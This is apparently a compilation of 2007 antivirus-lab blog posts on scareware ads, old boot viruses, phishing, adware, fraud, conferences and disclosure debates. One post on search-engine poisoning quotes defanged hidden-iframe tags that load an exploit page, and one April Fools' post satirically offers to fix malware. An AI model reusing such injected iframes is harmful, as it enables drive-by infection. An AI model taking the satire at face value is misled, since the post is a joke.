Would you really believe it’s all “for educational use only on your own pc to test for any flaws in your system“?

Is this in any way educational, or is just another shortcut to help script kiddies to vandalize the internet? Is this really a good idea?

Browsing my webmail account on one of the biggest providers in Italy I was hit by this popup message:

The cause of the javascript popup was the banner at the top of the page, urging me to download and install the SystemDoctor software.

I’m familiar with the brand, it’s an application that claims your computer is full of errors and then asks you to buy the registered version to clean them.

To verify, I followed the link and installed the software which found 375 “severe errors” on a crystal clean Windows XP installation, including marking as “critical error” files dropped by the installer itself, perfectly legitimate registry keys etc. Asking for money to remove imaginary errors is, I would say, questionable behavior.

So the questions of the day are: “Should web service provider police their ads? Should they make sure paid banners are safe for their viewers? And will this trend of malwae writers using paid ads to distribute malcode continue?”

This one forced me to take a panicked look at my calender to check the date, yes, it’s still the year 2007

Confirming posts in various forums there is indeed a part of the production of Medion MD 96290 Laptops, that were sold at the Food Discounter Aldi in Germany last week, that are infected with the Boot Virus Stoned.Angelina. In a document on their danish website (in danish) Medion describes the incident and provides instructions how to remove the virus.

To make it clear, the name of the virus has got absolutely nothing to do with any famous Hollywood Star! Stoned.Angelina is a Boot Virus that infects the bootsector of floppies and the MBR of hard drives, it doesn’t actually have a payload and was first discovered early in 1994. That was a time when the descriptions of the few viruses known where still in a printed Virus Encyclopaedia…

How it could happen to get the Laptops that have Microsoft Vista preinstalled infected with this ancient boot virus remains a bit of a mystery. The only way to infect a hard disk with a boot virus is by actually booting from an infected floppy. Nothing I’d expect to be done nowadays when installing Vista…

One lesson should be taken from this incident: The old viruses are not going away anytime soon. Looking at some customer’s reports of viruses found, there still is the occasional Parity.b, Form.a and Tequila that is found. Some weeks ago even an image of a floppy disk infected with an Amiga virus had been posted in an emulator usenet newsgroup.

Germany’s Federal Criminal Police Office (the BKA) announced today that they busted an internation group of phishers, arresting 10 persons and seizing a number of computers together with other evidence. From the press release it’s evident this is a group that has been harassing the world with phishing emails containing Downloader-AAP as an attachment.

Downloader-AAP is ranked first in the list of ‘Top Corporate User Malware’ in our Avert Labs Threat Library. For many months there have been several waves a week of phishing emails sent with new variants of this downloader, that when executed would install some keylogging trojan. The emails typically look like a receipt sent from some company with details supposedly be found in the attached .zip. Some of these emails even claimed to have come from german law enforcement agencies, stating you’ve been caught sharing music, content from your hard disk has been confiscated using the ‘Bundestrojaner’ and the protocol is attached. Like in the example below:

I sincerely hope this is the last we’ve seen from this group.

Following recent allegations from the USA, Germany and lately from Australia and New Zealand that government and military networks have been attacked out of China and an earlier warning from the German Federal Office for the Protection of the Constitution (Verfassungsschutz) in february that an increased activity in hacking attempts out of China has been detected, it is now China who steps forward and claims they “have suffered ‘massive’ losses of state secrets through the Internet”.

According to a Reuters news the Vice Minister of Information Industry Lou Qinjian said that China’s computer networks were riddled with security holes and that the United States and other hostile powers where exploiting those for “political infiltration”.

While I’m definitely not in any position to judge on who did what to whom, this is starting to look like a contest for the title of ‘Least Secure Government IT Systems’.

Maybe this is an old news to some people, but I just knew that Compuware would no longer be continuing the development of NUMEGA Soft Ice. http://biz.yahoo.com/prnews/070611/clm093.html

Starting from 1988 through 2003, I used Soft Ice almost on a daily basis. Without Soft Ice I do not know where I would have been with my career. I purchased almost every single release of Soft Ice. I still have at least four or five boxes of Soft ice and also Driver Works. I personally and other people did many magical things to the Windows systems (DOS, Windows 3.1, Windows 95, Windows Millennium, Windows NT 3.1, Windows NT 4.5, and Windows 2000) using Soft Ice. SoftIce will be greatly missed.

Certainly, Soft Ice will remain as the most powerful debugger ever built for personal computer systems. It is the only debugger that allowed us to do live kernel debugging on the same machine by just pressing Ctrl+D. I  still miss those days when I used to have two monitors connected to my computer, one CGA/EGA monitor connected to a CGA/EGA card for Soft Ice output and another VGA monitor connected to the VGA card for the regular Windows output.

Not sure how many people today will have missed Soft Ice like me, but certainly Soft Ice inspired many generations of personal computer system programmers, and computer hackers as well :-). Nowadays everyone uses WinDBG which, IMHO, is far less capable than Soft Ice.

More than ten years ago, kernel debugging using WinDBG was very painful, as it required two machines connected to each other via a null modem cable. During those days, SoftIce was the only option for live kernel debugging on the same system. SoftIce has a rich set of debugging commands to debug device drivers as well as the Windowing system. Nowadays kernel debugger and reverse engineering seems to be easier by using a virtual environment like VMWare Workstation or Virtual PC. Microsoft has also made the Windows public symbols available a couple of years ago. So reverse engineering is simpler these days. Nonetheless, nothing similar to the magic of hitting Ctrl+D and jumping immediately into the kernel debugger.

I can only wish that Compuware turns Soft ice into an open source project so that it does not die completely.

The Tuesday release of the much anticipated computer game BioShock has quickly turned up another clash between enthusiastic customers and the interests of publishers and copyright control. Reports indicate that the PC versions of the game, whether purchased on physical DVD media or via the Steam online distribution service, utilize a DRM scheme that limits the number of installations possible with a given license key. The apparent limit of two (due to customer uproar it appears this number is being raised to five) installations per license poses hurdles for users facing frequent system upgrades or recovery from system failures.

Interestingly, content owners and publishers face the same fundamental conundrum in implementing DRM as malware writers do in attempting to encrypt or otherwise obfuscate the code of their creations. The crux of it is this: If, in the end, you need to actually run code or play media content, there will necessarily be a time at which it runs in the original, unprotected form.

For the DRM case, let’s take commercial movies as an example. The data on DVDs, HD-DVDs, and Blu-ray discs is encrypted. But, ultimately you need to get the original unencrypted data onto a display device. There’s simply no way around it. The player itself handles the initial decryption. Setting aside the flaws uncovered in the CSS and, more recently, AACS implementations, that was generally sufficient until purely digital displays and connections became more prevalent. At that point there was a risk of perfect digital duplication by simply sampling the unencrypted output from a player. HDCP is a clever attempt to plug that hole. It establishes an encrypted link between the player and display, moving the point at which the digital data is in it’s “raw” unprotected state as close as possible to the final output stage (within the processing electronics of display itself), thus making digital duplication of the unprotected content more difficult. But still, the final unencrypted data has to be produced on the customer’s equipment for viewing. As such, an HDCP-compliant device could be constructed to gain access to that data and copy it.

In the case of BioShock it’s not raw media content being decrypted and displayed, but the act of allowing the game to run. At some point, after whatever checks or validation schemes are used, the customer needs to be able to actually play the game. As long as that path leads to the eventual successful launch of the game (all the data and resources needed for it to run are already on the system once it’s installed), it is possible to find a way to circumvent it and cut the DRM controls out of the picture.

Malware writers face a similar challenge when trying to obscure the code of their creations from security software using packers or encryption. Try as they might, they can’t get around the hard fact that they ultimately need to execute their original unobfuscated machine code. To do that, it has to exist in that state on the system at some point, even if as only one instruction at a time in memory. And since that’s true, we’ll always have a basic opportunity to get at it (though this is more difficult in some cases than in others).

Although the copyright lawyers may wish it otherwise, it’s a zero-sum game between usability and control. The only way to absolutely ensure that publicly distributed media content won’t be pirated, software won’t be run in an unauthorized way, or native code be accessed and identified is to encrypt the entire thing using a very strong algorithm with a highly random key, and then delete or never reveal that key to anyone. Did I say “absolutely”? That’s not quite right. The encryption algorithm or key chosen may have an unknown weakness that could later be revealed, so the only guaranteed solution is not to release the data at all! Of course, for a commercial product that would present a bit of a challenge for the marketing department (digital Cheese Shop, anyone?) and in the case of a malware executable would render it similarly useless to the author.

Unfortunately, in the case of DRM’s trying to strike a balance between some degree of control and maintaining the ability of the software or media to operate can often end up inconveniencing and angering legitimate users. Pirates, on the other hand, will happily exploit this fundamental flaw of the situation as they develop software cracks and duplication methods to circumvent the protection.

However, in the case of security software versus malware obfuscation that same flaw ensures there will always be at least one chink in the armor for us to work on when we tackle the latest virus or Trojan.

Hoax virus warning messages are more than mere annoyances. After repeatedly becoming alarmed, only to learn that there was no real virus, computer users may get into the habit of ignoring all virus warning messages, leaving them especially vulnerable to the next real, and truly destructive, virus. 

For years, I’ve been telling people how to recognize new or new variations of hoax e-mails.  There are generally 5 things to look out for:

• Hoaxes often mention a big industry company as the source for the information (e.g., Microsoft, AOL).
• Hoaxes often say, in some wording or other, that the threat in question is the most powerful ever.
• Hoax messages are often short and always give us the impression of fear.
• Hoax creators ALWAYS ask their victims to spread the message to the maximum number of people possible.
• Hoaxes often indicate that the threat was released at an indeterminate time (yesterday, for example, rather than specifying a date).

But what happens when the “hoax” information is (somewhat) true?

I came across an e-mail from a customer yesterday, that at first glance, looked like the usual hoax e-mails.  Though after looking at it closely, it was definitely referencing the W32/Zhelatin.gen!eml threat.  

The surprise was that the very next paragraph, practically word for word, was the Virtual Card For You Hoax.

What’s interesting about this is that the Zhelatin threat is not too far off from the general description of the hoax, even though we can see that all of the 5 hoax guidelines mentioned earlier are represented in the second half of the message, and they in no way reflect anything accurate about the Zhelatin threat.  However, this combination can confuse the user into thinking the entire message is a hoax, or that the Zhelatin threat is accurately described by the second half of the message.

I ended up telling the customer that the message is “half-right”, gave them both the Zhelatin and Virtual Card description links, and asked them to ensure that their Engine and DAT files were up to date.

As always, remember to follow our Security Tips, and if you have a question about a suspicious e-mail, send us a sample.

Š

So who said that Hackers cannot survive outside closed buildings?

Closing ceremony is just over and the approximately 2000 visitors of Chaos Communication Camp 2007 are packing their electronic gear and camping equipment, as well as assessing the damage caused by yesterday’s heavy rain. Those of you who did not make it here missed 5 days of exciting cultural exchange in a truly unique environment. To get an idea what it was like, check out the picture archive.

The hottest topics discussed all over the camp were a new german law in effect banning hacker tools and the so-called Bundestrojaner, proposed to make online searches of suspect’s computers possible. And then there were talks. A lot of them, covering various technical, cultural, social and legal aspects. For those missing a talk or missing camps altogether there is some hope: All talks in the big speaking areas were recorded and will be made publicly available for download sometime later.

And finaly what I liked most: Powerpoint Karaoke

Speakers and volunteers from the audience get a random powerpoint presentation to present, seeing the slides for the first time while doing so. Just so funny to watch!

Just 3 days after the closing ceremony of Defcon, security enthusiasts from all over the world continue their meetings at the Chaos Communication Camp 2007 at a retired military airport near Finowfurt, close to Berlin. Can you even imagine a camping site with fast ethernet and power in every tent and crowded with some of the world leading security experts? If you’re not on site and witness it yourself, the answer is probably no, so here are some pictures.

Same as with Defcon, meeting people and exchanging information and ideas is really why most participants are here, but there also a number of excellent talks. Many speakers chose to present here and didn’t bother going to Black Hat and Defcon, saving hassle with U.S. immigration, giving their fingerprints at the border, etc. The talks are delivered in two concrete quansit huts, a kind of overground bunker for fighter jets, which is just cool. Having just delivered my talk about Trojans, this is likely to be the most awesome location where I’ve ever spoken. Here is a schedule of the talks and the list of speakers. Besides those talks there are numerous activities, projects and workshops going on all over the camp and there are dozens of small villages set up, including the Hackers on a Plane (Hackers on a Bus, really) and a large tent to hang out by c-base, Berlin’s famous cultural project. Right now there is some thunder on the horizon, so let’s just hope it doesn’t start to rain, or there will be LOTS of mud encrusted electronic devices for sale on your favorite internet auction site!

Oh the irony: Apparently someone has taken issue with some of the things I have said about the Immunity Debugger, available from Immunity and posted about an alleged backdoor within the program to the full-disclosure mailing list! Below is a copy of beginning of the post:

From: goudatr0n
Date: Thu, 9 Aug 2007 13:58:01 -0400 (EDT)

2. OVERVIEW
The Immunity Debugger contains a backdoor that emails
session history, running applications and other system
information (location, IP address, machine Owner Name)
to an email address at immunitysec.com

The original post with full text and comments can be read here. Needless to say, I am not involved in any way. Let me restate that I think this to be a very powerful tool that was written for all the right reasons. My objections to it are how it can be used by all the wrong people to write more zero-day exploits, quicker and more efficiently. That puts users at risk. I know this is not the intent of the tool or Immunity.

I gotta say tho that anyone who takes the time to go through this much trouble to goof on me, I got nothing but love for!

Now where was I in my ramblings? Oh yeah… presentations and DefCon music.

What I have always admired about DefCon content is that it is not exclusively about computer hacking but rather about hacking more as a way of thinking. In line with that, one of my favorite presentations was by Aaron Higbee entitled Hack Your Car for Boost and Power which discussed numerous ways (yes, some computer-based) of boosting a cars horsepower. He covers many areas of tuning and even touches on privacy concerns with the on-board ECU.

I also very much liked Peter Gutmann’s talk on The Commercial Malware Industry but one of the best talks was by Lukas Grunwald’s Security by Politics - Why it will never work. Lukas, for those who don’t already know, is a quite clever security researcher from Germany who discussed what happens if security is driven by politics and compromise. He also covered additional security risks by the new generation of electronic passports. Lukas is simply brilliant in the areas of RFID and ePassport security. It was a very though provoking talk.

Many of the other talks were great but those really stick out in my mind (aside from our own Toralv and Dirk).

The Black Ball, another DefCon staple, was equally a hoot. Music was great as I have been a fan of Regenerator for quite a while now. They and the other DJs (Patrice, Wintamute, SailorGloom, Great Scott!, Catharsis and Kris Klink) are all worth a Google or two. Dark room, industrial noize, good beer and latex….. Ahh what more couldya want!

I highly recommend everyone bookmark the following sites: DefCon Forum and DefCon Pics as they will do the best job of post convention updates.

Cheers!

DefCon gets quite a lot right and it is not just great content. Actually the content, IMHO, might be the LEAST important aspect to DefCon.

Let’s be honest here. We are all infosec warriors in the information age. We all keep pretty much up to date on security research, malware developments, game hacking, etc…. on a daily basis. Blogs, forums, podcast and other mediums allow us to stay bleeding edge. We have to. Most information in most presentations at most conferences is a good 6 months old (not always, but usually). This is where DefCon distances itself from the pack.

If you really want to see where security theory and research practicality collide (fueled by Brew and Coffee Wars!) then the floor of DefCon is the place to be. Truthfully, it is the activities of DefCon, not the presentations, that you need to get caffeinated for:

* The Network @ DefCon
* 0wn the b0x
* Phreaking Challenge
* CTF (if you gotta ask…….)
* aCTF
* LPCON5 - Lockpicking Contest
* Hacker Jeopardy (one of my personal favorites)
* TCP/IP Drinking Game
* Wardriving Contest
* Wireless Village - ChurchofWiFi
* Lockpicking Village

No disrespect to the presenters or any of their content but pwning-in-action is what makes DefCon well…….. DefCon. This is where the training, conferences and theory all meets the pavement. Can you get root? Can you stop someone from getting root? Do you really know what you are doing? Hey, is that a custom PWS variant that just pwned my data? Ohhhh, I never saw that evasion before!!! It is events like the above where the real education takes place.

Oh and the the Toxic BBQ! Part 2 later today…..

I have received several requests to post the final versions of John Viega and David Coffey’s BlackHat presentation as well as for Toral Dirro and Dirk Kollberg’s presentation form DefCon. They will be uploaded and available later today as well as updated ramblings and musings from myself…..

Hacker Jeopardy was hilarious and the music at the Black Ball was great!!!

Your roving man-on-the-street Dave Marcus here at the middle escalator leading up to BlackHat 2007! I cannot really say that I am overflowing with excitement yet as I am fully un-caffeinated which is a rather disturbing thing considering all the content today.

I am looking forward to many of the briefings over the next several days–virtualization, stealth, fuzzing, etc. My geek cup truly runneth over. Avert Labs has a good showing this year at both BlackHat and DefCon as we have presentations at both. John Viega and Dave Coffey will be presenting on building effective application security at BlackHat, while Dirk Kollberg and Toralv Dirro will be discussing recent changes in Trojan developments at DefCon.

I will be attending briefings, blogging on happenings and cornering the l33tz for interviews for our AudioParasitics podcast. Stay tuned!

I had a recent encounter with online fraud and social engineering that was unusually complex.

I was selling an item on eBay. The item was brand new, and retails for $250. So, imagine my surprise when I received the email announcing the auction ended with a winning price of $395!

This was followed about two hours later by another email from eBay, notifying me that the auction had been canceled due to fraudulent bidding.

I didn’t think much of it, other than being mildly frustrated at later having to relist the item and wait for another auction to complete.

The next day I received a poorly constructed fake PayPal “confirmation” email, showing that the winner of the auction had sent me funds, not only for $395, but with an additional $100 for shipping! The terms at the end were distinctly out of synch with the actual PayPal process (warning of account cancellation unless the item was shipped and tracking number sent, and the highly suspect paypal.enquiry@OfficeEmail.net address specified for communiations). The shipping address for the item? A location in Nigeria.

What I found interesting was that the hyperlink to the eBay item included in this fake payment email pointed to the United Kingdom version of eBay and with a completely different item number. That auction had been pulled as well by the time I recieved the email, so I couldn’t examine what was going on. My suspicion is that my original auction posting may have been duplicated in hopes that it would remain if the original auction was discovered as fraudulent and canceled. (BTW, kudos to eBay for quickly identifying and canceling both!)

About an hour after this fake payment message, I got an email from the “winner” of the auction:

Hot on the heels of this, I next received what ended up being the final communication:

Although the whole endeavor lacked a lot in establishing authenticity, I was intrigued by the different elements that were used in the attempt. To sum up, we have:

1. Fraudulent bidding to push an eBay item well beyond its reasonable value, along with…
2. Possible duplication of the auction posting in an attempt to support…
3. A fraudulent PayPal notice, which includes social engineering elements of both additional money and threatened account suspension, followed by…
4. Multiple communications from the auction “winner” that also include both negative (threatening to involve law enforcement) and positive (offer of possibly even more money beyond the already ridiculously inflated price) social engineering elements.

That’s a good amount of work to go through to get a hold of my $250 item! Nonetheless, I could imagine more sophistcated versions of such a multipronged fraud attack being disturbingly effective.

Last Thursday we noticed a large spam campaign atempting to discredit Spamhaus and DDOS their phone lines :roll:. This is undoubtedly linked somehow to the massive and long term DDOS attacks on the three major blacklists run by Spamhaus, URIBL and SURBL (The latter two are currently being protected buy the DDOS Jedi at Prolexic). DDOS’s on this scale are risky for the botmasters since it exposes the botnets to those interested in such things.

Here is a copy of the mail:

From: Christy June <fake-sender@fake_place.com>
Date: Fri, 5 Jul 2007 20:34:52 +0100
To: “some, one” <spamme@mcafee.com>
Conversation: Which shalom myself magnetic
Subject: What shalom herself magnetic

WORKING TO PROTECT INTERNET NETWORKS WORLDWIDE
Spamhaus tracks the Internet’s Spammers, Spam Gangs and Spam Services, provides dependable realtime anti-spam protection for Internet networks, and works with Law Enforcement to identify and pursue spammers worldwide.

The SBL database is maintained by a dedicated international Spamhaus team based in 9 countries, working 24 hours a day, 7 days a week to list new confirmed spam issues and - just as importantly - to delist resolved issues.

The Spamhaus Exploits Block List (XBL) is a realtime database of IP addresses of illegal 3rd party exploits, including open proxies (HTTP, socks, AnalogX, wingate, etc), worms/viruses with built-in spam engines, and other types of trojan-horse exploits.

The Exploits Block List can be used by all modern mail servers, by setting your mail server’s anti-spam DNSBL feature (sometimes called “Blacklist DNS Servers” or “RBL servers”) to query xbl.spamhaus.org. Use of the XBL is free for users with normal mail servers (but networks with high email traffic should see DataFeed).

You can get MUCH MORE if you contact us:

The Spamhaus Project Ltd. 50 Churchill Square, Suite 6, Kings Hill, West Malling ME19 4YU United Kingdom, Tel (+44) 870 766 xxx

This is not an uncommon event for RBL owners, however this one is only unusual because of the size, duration and indescriminate nature of the campaign.

The spammer in this case also had to fake the senders address because Spamhaus’s SPF record is of the “-all” variety which sensibly denotes that they *only* permit one IP address to send mail for their domain and so affecting the bots ability to deliver further.

Obviously Spamhaus do not use botnets to send out promotional material
(If this all sounds a bit too fishy to be true you can read more about the traditional “Joe-Job” attack right here).

Following up on a tip from my colleagues at McAfee’s SiteAdvisor, I examined an interesting piece of software recently from a provider I’d not heard of before, a product called “MeMe,” made by MeMedia, Inc.

The installation was immediate upon launching the installer, with no EULA or other notification displayed until the software was running. The MeMedia Web site suggests the software is intended to supplement a user’s browsing and general use of the Internet by tracking usage (locally, the software assures) and then proactively searching out and alerting the user to additional content that matches the interest categories that MeMe has identified. The term “meocentrism” is cutely coined on the product’s web site to describe this. I also read a notice that the software may be used “in support of free software,” suggesting potential bundling. Oddly, visiting MeMedia’s home page results only in a page with a logo and “coming soon,” though several subpages are accessible and the software appears to be available and functioning. The interface is designed to resemble a three-dimensional cube, and uses many shadow and animation effects:

Peeking under the hood, I grabbed some of the network traffic to verify that no user-browsing data was in fact being transmitted. I was surprised to find communication with servers in the whenu.com domain, and even parameters being passed in HTTP transmissions such as “&app=whenusave.” Save! (also incarnated as “SaveNow”) is an advertising client product made by WhenU. I did not note any personally identifiable data being transferred to remote systems during a few limited tests, but the indications point to a mechanism similar to what WhenU uses in its advertisment products (running search terms against a local database to preclude the need for sending user data from the local system). It appears that the MeMe software is somehow leveraging WhenU’s infrastructure. Along with many overlapping IP addresses and DNS records, we have indications that MeMedia is in partnership with or wholly owned by WhenU.

Crossing into speculation, I find interesting the apparent repurposing of adware infrastructure as a “usage assistant”; something to help a user find content on general topics of interest rather than simply pushing comparative product offers. The vendor achieves the same goal of connecting a user with specific content; MeMedia could easily define and control the data set that the client software could search to find the user’s identified interests. Vendors could feasibly monetize additions to such a content repository as well as more direct targeted advertising. If my speculation is correct, such a scenario–though not far removed from traditional push-advertising models–might at least be better accepted by users. Although the field of data such a “meocentric” digital helper could sift through might really be a walled garden of sponsored content, the idea seems less intrusive than a pop-up hawking a widget.

On my test environment, which is essentially clean of any usage data, MeMe “found” an article on Michael Vick for me after running for several minutes. This occured even without my doing any browsing or other activity. I later found that several terms were apparently hard coded into the installer package (ExecuteParameters=”/i\”rock;Chicago Bears;Serena Williams;Michael Vick\”"), ensuring that the recipient would at least have some “interests” about which content could be “found” right off the bat.

It’s awfully kind of them to look out for us boring folk. 

Wired posted an excellent article recently that highlights the pitfalls of hiring a “blackhat” to do a “whitehat’s” job. Brett Shannon Johnson was once on the U.S. Secret Service’s most-wanted fugitives list for credit-card and identity theft. After being apprehended, he was recruited to help catch the bad guys as an operative for the Secret Service. Before long he was back to his old tricks.

“It was $350 a week [from the Secret Service] vs. $5,000 or $6,000 a week” from his fraudulent tax-refund scam, Johnson told Wired News by phone. Johnson had set up a tax-refund fraud scheme. The Secret Service caught him and he was arrested again.

Although Johnson claimed to have stopped $3 million in fraud before backsliding, he noted that having to work with his former partners in crime was like “taking an unrehabilitated crack or heroin addict and placing him in a drug environment, telling him not to use drugs.”

Trustworthiness is a huge consideration security companies ponder when looking at prospective candidates–and Brett Shannon Johnson is an example why most security companies do not knowingly hire blackhats.

It has been standard policy for a long time in the anti-virus (AV) industry not to hire virus authors, largely because of the myth that it was the AV companies who wrote the threats that they then sold protection for. With the plethora of threats on the Internet today, I think most people understand that we have no reason to create any more work for ourselves. Of course, not everyone shares this zero-tolerance policy. In 2004, it was reported that Sven Jaschan, author of the Sasser worm, was hired by SecurePoint. This ended up costing the security firm a partner in the AV space; H+BEDV severed their ties with SecurePoint.

The topic of hiring someone who’s written a virus overlaps with our most recently published podcast, which tackles the issue of teaching malware authoring in higher education. For more on this topic, have a listen:
http://podcasts.mcafee.com/audioparasitics/

As for Brett Shannon Johnson, he aspires to work as a fraud consultant one day.

If we look at any large brand phish site these days they have “the security logo”, some call it a seal, smart icon or security stamp. You know the ones, they claim to “verify your site in real time” or give”confidence and assurance to trust the identity of your web site“.

The URL both logos link to is the same:
:evil:Phish:
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SCGI.EBAY.COM&lang=en
:cool:eBay:
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SCGI.EBAY.COM&lang=en

You could even try it for yourself here.
I was going to call this post “Trust me, I have a logo” - take your pick

They are pretty easy to copy, even the ones with the custom text on could be faked easily. Their value comes from people associating them with data security and through that perception they inspire confidence. Please remember, They are just logos! Companies use them because they provide reassurance and most importantly they increase sales. (Verisign have a good pdf on profitable usage).

“71 percent of UK online shoppers will only make purchases through sites that include a trust mark.”

I’m not just picking on the SSL guys here, they really do provide you better options than “logos” as VeriSigns’ Tim Callan notes on a recent blog. EV certs are available for $$$$, but for many the logo is good enough:eek:
Oh, while I’m on the subject, the card companies have “nice logos” too

Please think of these logos as a security reminder, you should express as much caution on sites displaying them as any other site, and if need be re-enter the URL by hand in a new browser window.

Recently Gartner slammed 3Com’s TippingPoint division for sponsoring zero day contests without giving the vendor Apple Inc. a chance to fix the flaws before their patch release. They apparently paid $10,000 bounty to Dino Dai Zovi, a well distinguished security researcher at the recent CanSecWest conference.

Wow! It is rather ironic that a security company, who presumably wants to protect customers, will first put everyone to risk, not notify the vendor on time, and then release signatures! The anti-virus community, long the target of (bogus) claims that they write viruses to make money, wouldn’t touch a contest like this with a barge-pole. In fact, even staunch full-disclosure advocates note the ethical disconnect implicit in security companies producing content earlier than their competitors via such initiatives (see http://blog.ncircle.com/archives/2005/08/3coms_zero_day_initiative_cest.html and our premier issue of Sage.)

As security vendors, our mission is to protect our customers and the internet community at-large , not to create hype and FUD by giving the world a chance to exploit unpatched flaws!! Failing to disclose to anyone leaves the good guys in the dark - but supporting irresponsible disclosure give the bad guys night vision…

I do. Usually. A bit less now.

I needed to find some flight information so I entered an airport name into my favorite search engine and in no time at all I had a nice page with all the answers.
But wait. I may have misspelled the word “airport.” So what? Tthe first entry looked just like what I wanted, so let’s click on it.

I was sent to a white page with the word “Ricerca…” meaning “Searching…” in the center. Not what I expected. And what’s the little dot in the top left corner? An hidden frame maybe. Let’s see the source:

[iframe xsrc="http://[don't go here].info/it.html” frameborder=1 width=1 height=1 scrolling=no]

and then

[iframe xsrc="http://[don't go here either].com/on/vlad/” width=10 border=0 height=10 style=”visibility:hidden”

What do you think? Could it be malicious?

To spare you the details I’ll tell you this loads a page filled with various exploits that will install a password stealer on your system, even if you don’t click anywhere.

The use of search engine poisoning is not new. What’s interesting here is the malware author’s successful attempt to maintain a low profile.

Poisoning a search engine for a misspelled word potentially lowers the chance of being spotted. Drawing too much attention works only for short periods. This way you get a guaranteed constant rate of new infected systems, without anyone’s noticing it.

Also, the “it.html” part of the hidden frame refers to the fact I was running the search from Italy. How many security companies do research in Italy? Well, we do, but not many others.

The bad guys are getting smarter. So what can we do to fight back? I know I’m going to sound like I’m wearing my McAfee hat, but here’s a link that can really help. SiteAdvisor. This will give you–with a visual flag–some quick advice on the safety of the site you are about to click on. Maybe the site you thought you found isn’t really what you were looking for. A useful tip.

Browse safe!

McAfee Avert Labs welcomes our new CEO Dave DeWalt aboard. Check out his first blog post on our sister blog Security Insights.

(With props to Ze Frank!)

sleepdoc Says: I love you guys who act like the IT guy on the SNL skit, “Jeez, one could easily manually remove the malware via autoruns or similar tool. …” Right, like the average user has any idea what you mean.

There is a very wide range of technical experience levels among readers of this blog, and it can be very difficult for us to write for all possible levels. So, we’ll conduct a little experiment: Periodically I’ll post a breakdown for those of us who are less technically inclined, to explain a security concept in layman’s terms.

This is where you come in: If this is helpful, let me know. If I’m still being too heavy on the geek-speak, let me know that, too. If you have a specific request, fire away. I’d like this to be as universally useful as possible.

So, here’s a basic breakdown of the ANI exploit situation:

There are a huge number of innocent Web sites–hacked by the same group that hacked the Superbowl site–that are hosting a file which exploits an unpatched hole in many recent Windows versions. The file was created in such a way that it can cause a system to download and run malware.

What that means to you and me is that either just by searching around to our favorite sites, or by following links in e-mail, we could be going to sites that are hacked to contain this malicious ANI file. We’re not talking about searching just for pr0n or warez or something, but regular, everyday Web sites.

If your system is vulnerable, you will not see it run - you may not see much of anything out of the ordinary. And from there, it could be silently pulling other nasty things down onto your machine. There is not currently a patch or work-around from Microsoft to fix this. That’s why this threat is such a big deal.

Adding to this scariness is that these ANI files are being frequently tweaked by the hackers so they can evade antivirus detection. We’ve added generic detection for these malformed files as new ones are found, and this has been working quite well so far at proactively picking up brand new variants. Having a firewall can also help stop those new files that are being downloaded by the ANI files, as those are being frequently updated too. (These downloader trojans are, very generally, what Ned was discussing in his comment)

The bottom line here is to be extra vigilant about updating your virus definitions frequently, and make sure you have a firewall. Keep an eye out on Microsoft’s site for an update.  They’re planning on releasing a patch tomorrow. Don’t run files, especially coming through email, which promise to be Microsoft updates or patches. Get your patches directly from Microsoft.

Next up: Firewalls 101 - what is an “open” port and why should I care?

During each day of the Month of Bug Bugs McAfee Avert Labs will provide analysis of flawed malicious code (aka bugs). These are viruses that don’t spread, password stealing Trojans that can’t leave the stable, drive-by attacks that crash and burn, phishing attacks that phlop, denial of service attacks that are denied, etc. Our analysis will highlight the errors made by authors, and show how these threats can be fixed and in most cases optimized for maximum potency.

Why have a Month of Bug Bugs?
McAfee Avert Labs is constantly looking at ways to respond to threats more quickly, and to deliver timely and accurate information. The goal of the Month of Bug Bugs is to increase researcher efficiency. On a daily basis researchers waste countless hours trying to replicate viruses and reproduce exploits and other malicious code that is poorly written and non-functional. If the authors would learn how to code these threats correctly in the first place, researchers could respond to more threats — more quickly. The Month of Bug Bugs is meant to highlight the common mistakes made by malicious code authors, and save our researchers the trouble.

Additionally, our researchers are sick and tired of Leetspeak used by @uth0r$. The poor display of grammatical and spelling skills contained in today’s threats is appalling and we will no longer perpetuate such ignorance. Therefore, not only will we be fixing technical bugs, we will also correct all grammatical and spelling mistakes made by malcode authors; this includes any improper salutations, such as “greetz”. Any personal messages in the code will be held to formal letter-writing standards “Dear Sir or Madam”, “To Whom It May Concern:”, etc.

Lastly, we’ll address the deplorable lack of consistent naming conventions in the source code that we analyzed and will re-write functions and variables utilizing one of the many standards in programming (Hungarian, Pascal, Camel notation, etc).

McAfee Avert Labs recognizes that this stance may be somewhat controversial, but we do feel that the benefits will outweigh the costs. In anticipation of resistance within the security community, we have prepared this FAQ:

Why would you want to fix broken malicious code in the first place?
Testing existing defenses often requires a working threat. To make definitive coverage statements, we need threats to work as they’re supposed to.

But why is protecting against broken threats necessary?
It’s not, BUT if we can fix a bug, so can the authors or someone else. We’re not being proactive if we don’t anticipate the next move of the attackers.

Aren’t you concerned that the end result will be more potent and infectious threats?
Yes, we do expect some collateral damage to occur; data will be lost, identities stolen, systems inaccessible, etc. But, you have to consider the trade-offs. Currently the well organized and well funded crimeware authors do a good job of testing their threats. It’s the less organized groups and individual authors that write the poorest code. These authors don’t have the same resources as the major players. So security researchers end up spending the most time on those threats that they should be spending the least time on.

Where can I submit my malicious code for review?
If you would like feedback on your malicious code, you can submit it here.

When will the Month of Bug Bugs start?
The Month of Bug Bugs will begin May 1, one month after April Fool’s Day.

One stock spammer is moving to European stocks shortly by the look of it.

My colleague Kevin McGhee just noticed this long-term stock spammer’s offer to pump European stock prices. They are looking spamming (’pile email advertising’ oooh, that’d be spam then) for partners. We chatted about this for some time and feel that maybe the SEC might have captured the flag of at least this spammer with their recent move.

Take a look at the text:

The freeze was for 10 days? Well iPackets certainly wants to sort it out A.S.A.P. according to their recent announcement and three binders full of info sent to the SEC. The question I ask is; with all this publicity what’ll happen next? Could the spammers or their partners still benefit if they continue to hold these stocks?

Today marks the launch of the official podcast of McAfee Avert Labs - AudioParasitics!!!!

A podcast with attitude, irreverence and difference. One day we may discuss disclosure, another day zero-day trends, yet another it might be new rootkit functionality. No matter. Rest assured that AudioParasitics will be there to beat that issue into submission with its two opinionated hosts (myself and the multi-talented Jim Walter) and a variety of the security industry’s finest minds.

Check us out at the AudioParasitics home page and also subscribe through iTunes.

Alright, maybe it is not exactly research related but I think it’s pretty cool. We previously announced that McAfee SiteAdvisor has been acknowledged by the U.S. Department of Commerce with its “Recognition of Excellence in Innovation” honor. The award was presented by the Honorable Robert Cresanti, U.S. Under Secretary of Commerce for Technology, for the technology’s innovative approach to making the Internet a safer place to search and surf for consumers.

A couple of pics below from the McAfee RSA booth:

